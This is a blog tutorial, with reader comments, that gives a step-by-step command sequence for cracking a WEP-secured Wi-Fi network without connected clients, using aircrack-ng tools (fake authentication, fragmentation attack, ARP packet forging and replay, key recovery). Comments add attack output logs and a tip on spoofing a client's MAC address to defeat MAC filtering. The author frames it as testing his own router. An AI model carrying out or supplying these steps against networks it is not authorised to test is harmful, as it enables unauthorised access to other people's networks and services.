in Security, Wireless

Clientless WEP Cracking

In case you weren’t aware, using WEP to secure your home network is a bit like putting a sign on your front door letting everyone know that you do have a key to keep it locked, but if they can work out your clue they’ll be able to find it. And then leaving your key under the mat.

I’ve tried cracking WEP before with limited success – relying on the network to be busy enough to capture packets doesn’t make for reliable cracking, but this method is different – forcing the access point to produce all the packets we need for analysis.  I thought it was time I finally proved to myself that it was possible so I dug out the old BT Homehub device and switched on the wireless before booting my MacBook Pro off an excellent pen test Live CD – BackTrack. (Update: BackTrack is now Kali.)

All you need is a machine with a wireless card, the BackTrack CD, the MAC address of your target access point, the SSID (the network “name”) and the MAC address of your wireless card.

Once booted, here are the steps I took to obtain the WEP key for the network:

airmon-ng start wifi0 11
wlanconfig ath0 destroy

export AP=00:14:7F:95:5B:AC    < -- Access Point MAC
export WIFI=00:14:51:XX:XX:XX  < -- WLAN Card MAC
export SSID=BTHomeHub-1100     < -- SSID of target network

ifconfig ath1 up
iwconfig ath1 mode Monitor channel 11
aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI ath1

At this point you should see an “Association Successful!” message, you can continue with:

aireplay-ng -5 -b $AP -h $WIFI ath1

You’ll now have to wait until aireplay returns with the packet it has found, when it asks to keep it, say yes. It’ll get saved to a fragment.xor file. You can use the .xor file to forge the packet we’re going to throw at the access point:

packetforge-ng -0 -a $AP -h $WIFI -k -l -y fragment.xor -w arp-request

This will write the forged packet to the file arp-request. Now, time to start capturing the packets we’re going to analyse:

airodump-ng -c 11 -bssid $AP --ivs -w cap ath1

In a new console, start throwing the arp-request packet out to the access point:

aireplay-ng -2 -r arp-request ath1

When it finds our packet, say yes and it will start broadcasting. You should see the airodump stats start to skyrocket at this point. After you’ve got approx 70000 data packets in the airodump window, start another console and run:

aircrack-ng -n 64 -b $AP *.ivs

This will do the work of cracking the key from the captured packets, after a while (less than a minute for me) it will hopefully spit out something like the following:


Job done. Told you WEP was easy.


  1. Hi,

    Good to see potentially a simple Macbook Pro solution.

    I’ve got so far with it seems to being alright up to the point of when you start in a new console! First of all, how do you do that? (im sure ill see it in the brief instructions on load lol) and also which version of BackTrack are you using? I tried BackTrack1 and it didn’t load correctly, BackTrack2 appeared more hopeful!


  2. How long usually does it take for aireplay to return the packet it found? In my case it reads 40000 packets and still didn;t return anything. In tutorials strangely things happen fast (3000 packets or I saw one with even 800).

  3. @Alex:
    Yes, I was using BackTrack2, which is an outstanding bit of kit, recommended for any security consultants/geeks.

    I’ve had results varying from, as you say, 800 packets right up to over 50000. In my experience that has depended on signal strength. I’ve had results in seconds on several networks though.

    Your network key will be on the sticker on the back of the HomeHub, or are you attempting to break into your neighbour’s wireless? I was using my own HomeHub for testing, I can’t condone attempting to steal anyone elses service.

  4. hi,

    i have laptop and loaded with vista. I connected WIFI internet connection with WEP Secured key. I have connected by using security code and it was working fine.

    I was seing porperites of my connection and unfortunately i deleted the security key which i could not save it in my laptop.

    Is there any way to get it with out going to see at router location.

    Kindly provide the solution which will be very useful to me.

    thanking your very much


  5. Hello,
    I have seen all of the the post about cracking WEP key in 10mins or less. But there are some factors to look at.

    1. You should have a very good word list dictionary
    2. The AP should be an OPEN…. u should know the rest.
    3. PSK AP will be crack if there is a client/ and not locked to accept only listed MAC Addresses….

    After saying all this, I guess you are wondering how I came to these conclusion. I have tested it in my house on my router. If you set the router to accept MAC Address listed, aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI ath1 isn’t going to work for you. But there is always a way around a problem. You could wait around till a client join the WLAN and copy his MAC ADDRESS. Now change your MAC address to his. You can then wait till he leaves, and you can start you work.

    I am not a master in this, but just a student learn Network Security and trying to make it secure. Any knowledge on protection please share with me.

  6. Hello Howard, thanks for your easy wep steps :)

    I am using BT3 Beta for USB, I’ve tried to hack my own wireless ap, with success(I was using WEP 128). Now, I’m trying to “hack” my brothers wireless ap (he knows about),
    but without success! ( he uses open system – wep 64bit and no mac filtering, channel 6 )

    I have an atheros 5006 built in my notebook, and I can succesfuly authenticate with his AP.

    But when I try to receive data packets to be saved as fragment.xor, … nothing happens,it just continues to read packets, and it never stoped, even after 2 hours!

    Here is the screen log:-
    aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI ath1 (i am always using my actual mac address not fake)

    Sending Authentication Request
    Authentication successful
    Sending Association Request
    Association successful :-)

    Everything OK, no error message here.

    After that:

    aireplay-ng -5 -b $AP -h $WIFI ath1
    Waiting for a data packet
    Read 21,293 packets (and it never stoped, even after 2 hours!)

    I also have tried it on some other ap, to see if it
    was my card or config problem, but with other ap, i managed to save fragment.xor in less than 3 minutes!

    I am stuck now, Any help would be apreciated

    Thank you and have a nice day.

  7. i tried backtrack 2 live CD, problem is i don’t know which wireles card i need (currently using my laptop’s built in card). when i log on it says i can use flux or KDE. i use KDE but the internet tutorials don’t work. there is one for flux. “backtrack> analyzers>kismet” when i do that nothing happens. htired coomand on KDE and flux to run kismet it won’t work.

    any ideas? pleaseeeee!!!

  8. thanks for the informative how to. After reading the comment that this works on a macbook pro, I decided to try it. I get as far as the first aireplay-ng command and no networks are found. upon destroying ath0, KDE’s internet utilities cannot detect any wireless networks. Is there a different workaround if I putting my Arport Extreme into passive mode doesn’t seem to be working? I know the AE card isn’t supported really in Kismac, but I was led to believe it would work with Backtrack3. Thanks!

  9. I had this working yesterday and then rebooted to test again – now i have the following issue:

    aireplay-ng -5 -b $AP -h $WIFI ath1

    Saving chosen packet in replay_src-0821-082546.cap
    08:25:48 Data packet found!
    08:25:48 Sending fragmented packet
    08:25:48 Not enough acks, repeating…
    08:25:48 Sending fragmented packet
    08:25:49 No answer, repeating…
    08:25:49 Trying a LLC NULL packet
    08:25:49 Sending fragmented packet
    08:25:51 No answer, repeating…
    08:25:51 Sending fragmented packet
    08:25:53 No answer, repeating…
    08:25:53 Trying a LLC NULL packet
    08:25:53 Sending fragmented packet
    08:25:53 Not enough acks, repeating…
    08:25:53 Trying a LLC NULL packet
    08:25:53 Sending fragmented packet
    08:25:54 No answer, repeating…
    08:25:54 Sending fragmented packet
    08:25:56 No answer, repeating…
    08:25:56 Trying a LLC NULL packet
    08:25:56 Sending fragmented packet
    08:25:58 No answer, repeating…
    08:25:58 Sending fragmented packet
    08:25:58 Not enough acks, repeating…
    08:25:58 Sending fragmented packet
    08:25:59 No answer, repeating…
    08:25:59 Trying a LLC NULL packet
    08:25:59 Sending fragmented packet
    08:26:01 Got a deauthentication packet!
    08:26:06 No answer, repeating…
    08:26:06 Sending fragmented packet
    08:26:06 Got a deauthentication packet!
    08:26:11 Not enough acks, repeating…
    08:26:11 Sending fragmented packet
    08:26:12 No answer, repeating…
    08:26:12 Trying a LLC NULL packet
    08:26:12 Sending fragmented packet
    08:26:13 Not enough acks, repeating…
    08:26:13 Trying a LLC NULL packet
    08:26:13 Sending fragmented packet
    08:26:13 Not enough acks, repeating…
    08:26:13 Trying a LLC NULL packet
    08:26:13 Sending fragmented packet
    08:26:14 No answer, repeating…
    08:26:14 Sending fragmented packet
    08:26:16 No answer, repeating…
    08:26:16 Still nothing, trying another packet…

    I have tried changing my router to a channel that other routers are not using but this also does not help.

    Anyone got any ideas on this?


  10. Hi,
    Did anyone manage to crack a wep network with those new macbook pro unibody built late 2008 or early 2009 ?? I only managed to install Backtrack 4 beta on those machines, after mainy tests with BT3. But my wireless card doesn’t seem to be supported. It says there is a Broadcom 43xx driver included but it has to be installed anyway and it’s really complicated. So, if anybody has a solution I would highly appreciate him to share it on this blog ! ;)

  11. rogerssssss: I have been trying to get wep crack working on my unibody macbook pro but I haven’t had any success. I think it is impossible with the current drivers. The macbook pros have a broadcom 43xx driver, but according to the aircrack-ng website, the wireless N card that is in the macbook pro is not supported.

    Here is where it says it’s not supported…

  12. Great tutorial!
    The line
    airodump-ng -c 11 -bssid $AP –ivs -w cap ath1
    should be
    airodump-ng -c 11 -bssid $AP –ivs -w cap ath1

Comments are closed.


  • 破解wep加密的无线路由器(无客户端) | 海纳百川 Linux October 9, 2009

    […] 很快就可以看到用 : 分割的密码了,整个过程不超过10分钟。以上只是一个快速破解的过程,具体的解释和细节请参考aircrack-ng的wiki。 本文参考了durdle的博客,向其致敬,我稍作调整并修正了原作者的笔误。 […]

  • yes, you can October 9, 2009

    […] els passos aquí i més info a […]